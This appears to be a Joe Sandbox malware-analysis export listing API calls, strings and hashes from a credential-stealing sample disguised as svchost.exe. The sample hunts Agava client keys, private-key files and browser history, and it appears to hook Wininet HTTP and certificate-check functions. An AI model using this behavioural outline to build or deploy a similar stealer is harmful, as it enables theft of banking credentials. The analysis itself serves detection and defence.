                                                                                                                                                                                                                • API String ID: 3942648141-1626032180
                                                                                                                                                                                                                • Opcode ID: 628c7eed72409471dbaf0f2bc64e93c028193eafceed562fac537113bb60812b
                                                                                                                                                                                                                • Instruction ID: 7ee748bf390413063978ab34eb45568cfd1a97028cf4c09b1f8ff2ea9b654c02
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 628c7eed72409471dbaf0f2bc64e93c028193eafceed562fac537113bb60812b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9D128F1A046415BE7224F38DC987B6BBF6BF46214B5846A8E8D5CB381E732DD09C760
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 0040351B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 00403567
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 0040356E
                                                                                                                                                                                                                • memset.MSVCRT ref: 00403586
                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 004035A0
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004035C3
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004035DA
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004035EE
                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00403643
                                                                                                                                                                                                                • wcsstr.MSVCRT ref: 00403662
                                                                                                                                                                                                                • wcsstr.MSVCRT ref: 00403695
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040372B
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040375C
                                                                                                                                                                                                                • SetEndOfFile.KERNEL32(00000000), ref: 00403763
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040376A
                                                                                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0040379B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F7
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004037FA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403807
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040380A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040381D
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00403820
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040382D
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00403830
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                                • String ID: 00-->$<Actions $p=<u
                                                                                                                                                                                                                • API String ID: 3028510665-3770785300
                                                                                                                                                                                                                • Opcode ID: 03d92ed9c350a22cff9bf3ba1b65dc31ee79c9631ebe11a42a2e6577e904a005
                                                                                                                                                                                                                • Instruction ID: 013638ac99e31dc1b3f0b1cbc1bcbf050739cfec6944e8e6b412d7e6261d8edc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 03d92ed9c350a22cff9bf3ba1b65dc31ee79c9631ebe11a42a2e6577e904a005
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32A1C0B1500311ABC720DF64CC49F5B7BA8EFC8751F048A69FA49A7391D774EA04CBA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc0d9), ref: 02D3B008
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(02D7DEC0,00000000), ref: 02D3B048
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3B04E
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3B056
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(02D7DEC0), ref: 02D3B065
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3B06C
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(02D7DEC0,00000000), ref: 02D3B0A1
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(02D7DEC0), ref: 02D3B0AC
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc0d9,00000000,00000001), ref: 02D3B0F6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$BackslashErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUser
                                                                                                                                                                                                                • String ID: 5e8dc0d9$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$path.txt
                                                                                                                                                                                                                • API String ID: 2920098687-4171141325
                                                                                                                                                                                                                • Opcode ID: e08e7cf121ce251eeaa95f6ce1a00066ba760404faf951400842a6b375769259
                                                                                                                                                                                                                • Instruction ID: 7803deae40c3f5f541fc04a8be78601f79323436095497636213a3f41bae7af3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e08e7cf121ce251eeaa95f6ce1a00066ba760404faf951400842a6b375769259
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F611531A40655AFEB124B34F86DBAA3BD6EF4A745F588542EC86CB340EB74CD44C7A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02D44800: memset.MSVCRT ref: 02D44824
                                                                                                                                                                                                                  • Part of subcall function 02D44800: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D4482F
                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,Agava_Client.exe), ref: 02D431C6
                                                                                                                                                                                                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02D431E5
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D431F7
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D43208
                                                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(Containers,UseToken,00000000,?,00000104,?), ref: 02D43250
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D43264
                                                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(Containers,KeysDiskPath,00000000,?,00000104,?), ref: 02D432A4
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D432B2
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D432C7
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02D43364
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7CF94), ref: 02D4339D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: strstr$HandlePrivateProfileString$BackslashCloseCreateCurrentDirectoryFileInformationModuleNameOpenPathProcessSnapshotToolhelp32memset
                                                                                                                                                                                                                • String ID: .ini$Agava_Client.exe$Agava_Client.ini$Agava_keys$Containers$KeysDiskPath$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$UseToken$keys.zip$keys_path.txt
                                                                                                                                                                                                                • API String ID: 2651364649-3373206754
                                                                                                                                                                                                                • Opcode ID: a043a30e8f5ed42554b92a87c36f850382964644dc28085f414e7e5e4952f5b3
                                                                                                                                                                                                                • Instruction ID: 3dca57d76b63df3ccbcb8dee0102893dd85f9def8f941ec00edb6084af021090
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a043a30e8f5ed42554b92a87c36f850382964644dc28085f414e7e5e4952f5b3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4A1F5309402595FDB16CB28A898BEA7BE5EF45304F6445D4E985D7340EF709E89CBE0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(Crypt32.dll,00000000,00000000,74DEF550,00000000), ref: 02D30F0E
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CertVerifyCertificateChainPolicy), ref: 02D30F24
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,00000006,00000040,?,74DF1620), ref: 02D30F3C
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,00000006,?,?), ref: 02D30F5E
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(Wininet.dll,00000000,00000000), ref: 02D30F6A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 02D30F80
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HttpSendRequestW), ref: 02D30F9C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 02D30FB8
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HttpSendRequestExW), ref: 02D30FD4
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetQueryDataAvailable), ref: 02D30FF0
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 02D3100C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 02D31028
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetReadFileExW), ref: 02D31044
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 02D31060
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$LibraryLoadProtectVirtual
                                                                                                                                                                                                                • String ID: CertVerifyCertificateChainPolicy$Crypt32.dll$HttpSendRequestA$HttpSendRequestExA$HttpSendRequestExW$HttpSendRequestW$InternetCloseHandle$InternetQueryDataAvailable$InternetReadFile$InternetReadFileExA$InternetReadFileExW$Wininet.dll
                                                                                                                                                                                                                • API String ID: 1705253364-835984666
                                                                                                                                                                                                                • Opcode ID: bec7ad07b1768b2c355feb339a0cbc9c4ac169805091d214cc2d1f375092d77b
                                                                                                                                                                                                                • Instruction ID: cc4cb8733bab085454f2a48d14c8e5c48c77993f2f2263d0eb39ecc94f761ab0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bec7ad07b1768b2c355feb339a0cbc9c4ac169805091d214cc2d1f375092d77b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43314E71B8171B76FA227A65FD1AFAB135C9F04E85F240110B902B2784DBB9ED09C978
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,prv_key.pfx), ref: 02D3EB5D
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC1A1), ref: 02D3EB9E
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC1A1), ref: 02D3EBD2
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3EBE7
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3EBF1
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3EBF9
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3EC0A
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3EC11
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02D3EC4B
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02D3EC58
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC1A1,02D6FDB8,02D6FDB9), ref: 02D3EC99
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3ECD4
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3ECDE
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3ECE6
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3ECF7
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3ECFE
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02D3ED3B
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02D3ED48
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D3EF40,02D6FDB8,00000000,00000000), ref: 02D3ED7E
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D3ED96
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D3EDA7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$ErrorFileLast$BackslashCreate$AdminAttributesDeleteDirectoryFolderHandleMakeSystemUser$CloseInformationThread
                                                                                                                                                                                                                • String ID: 5E8DC1A1$pass.log$path.txt$prv_key.pfx
                                                                                                                                                                                                                • API String ID: 448721894-3200690458
                                                                                                                                                                                                                • Opcode ID: 082ce2d62c0c879427fd24d676255c2f970f67d9e09e9348d015e7b466f7abef
                                                                                                                                                                                                                • Instruction ID: 5cc335664ca942f49e3dc8855f580d32a7680006b9bb6c1f89396d1c6122f9d7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 082ce2d62c0c879427fd24d676255c2f970f67d9e09e9348d015e7b466f7abef
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3710531A402159FDB129F28E86CBEA7BE5EF45700F548990E986C7380DB70DD84CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 02D3E308
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,found.), ref: 02D3E323
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,asus), ref: 02D3E33E
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC03F), ref: 02D3E364
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3E39E
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3E3A8
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3E3B0
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3E3BF
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3E3C6
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC03F,?,?), ref: 02D3E469
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3E4A3
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3E4AD
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3E4B5
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3E4C4
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3E4CB
                                                                                                                                                                                                                • FindNextFileA.KERNEL32(?,?), ref: 02D3E5BF
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?), ref: 02D3E5F3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Error$LastPath$AdminBackslashCreateDirectoryFileFolderMakeSystemUser$AttributesFindModeNext
                                                                                                                                                                                                                • String ID: .txt$.zip$5E8DC03F$asus$found.$keys$path
                                                                                                                                                                                                                • API String ID: 2233314381-4152965783
                                                                                                                                                                                                                • Opcode ID: a95d4c8463610239b0dce4ad51964a37958845e731baef9aabfd70e352cd120d
                                                                                                                                                                                                                • Instruction ID: e14125a5325580057a474fd32a2a2e3172fb458efdbeb8630e5dec49226f5326
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a95d4c8463610239b0dce4ad51964a37958845e731baef9aabfd70e352cd120d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3191E4315083468FCB16CF34E468AABBBE5AF89345F188958E8C6D7340EB31DD49C7A1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02D246E5
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D2470D
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,74DF3490), ref: 02D24747
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24769
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02D24775
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,IE history:,0000000C,02D256A1,00000000), ref: 02D24789
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02D24797
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D247AB
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02D247B7
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02D65B10,00000001,00000000,00000000), ref: 02D247CB
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02D247D9
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24803
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D2480F
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D24824
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02D24834
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24848
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24854
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D24868
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24876
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D24895
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02D248AC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$LockPointerUnlockWrite$_snprintf$CloseOpenQueryValue
                                                                                                                                                                                                                • String ID: IE history:$Software\Microsoft\Internet Explorer\TypedURLs$url%i
                                                                                                                                                                                                                • API String ID: 757183407-427538202
                                                                                                                                                                                                                • Opcode ID: 10f4d5754d3c0ec9e1e0ba065cbc1b007659ac05c1ced394729626424c623b86
                                                                                                                                                                                                                • Instruction ID: 3c2bb73f7e5091a752a32e50d297708623e3a0a2f49ab89881c548a1a85a844b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10f4d5754d3c0ec9e1e0ba065cbc1b007659ac05c1ced394729626424c623b86
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0512C71A91315BBF7208B90AC8EFEE7778AB49B05F504444F701AA2C0D7F06E948BB5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02D34330: IsUserAnAdmin.SHELL32 ref: 02D3433A
                                                                                                                                                                                                                  • Part of subcall function 02D34330: memset.MSVCRT ref: 02D34370
                                                                                                                                                                                                                  • Part of subcall function 02D34330: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02D34397
                                                                                                                                                                                                                  • Part of subcall function 02D34330: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02D343BA
                                                                                                                                                                                                                  • Part of subcall function 02D34330: GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02D3442D
                                                                                                                                                                                                                  • Part of subcall function 02D34330: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02D34434
                                                                                                                                                                                                                  • Part of subcall function 02D34330: memset.MSVCRT ref: 02D34444
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02D3503F
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D35054
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: IsNetworkAlive.SENSAPI(02D26BEE,00000000), ref: 02D34B03
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: IsUserAnAdmin.SHELL32 ref: 02D34B11
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: DnsFlushResolverCache.DNSAPI ref: 02D34B1B
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: memset.MSVCRT ref: 02D34B38
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,74DF0F10), ref: 02D34B57
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02D34B70
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D34B83
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: memset.MSVCRT ref: 02D34B9C
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,74DF0F10), ref: 02D34BB5
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02D34BC8
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D34BD5
                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 02D35075
                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 02D3508C
                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02D350A4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000000,00000001,00000000,?,?,Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000001,?,?,00000001,00000000), ref: 02D3512C
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D3512F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D3513C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D3513F
                                                                                                                                                                                                                • RtlImageNtHeader.NTDLL(00000000), ref: 02D35165
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • id=1&post=%u, xrefs: 02D35046
                                                                                                                                                                                                                • C:\Windows\apppatch\svchost.exe, xrefs: 02D35173, 02D3519B, 02D351B0, 02D351BB, 02D351D1
                                                                                                                                                                                                                • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02D350CB, 02D350E0, 02D35108
                                                                                                                                                                                                                • A1633F27a, xrefs: 02D35029
                                                                                                                                                                                                                • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02D350C2
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$memset$Process$AdminCheckConnectionInternetTempUserlstrcpyn$AliveAllocCacheCountFileFlushFreeHeaderImageNameNetworkOpenPathQueryResolverSleepTickValidateValue_snprintf
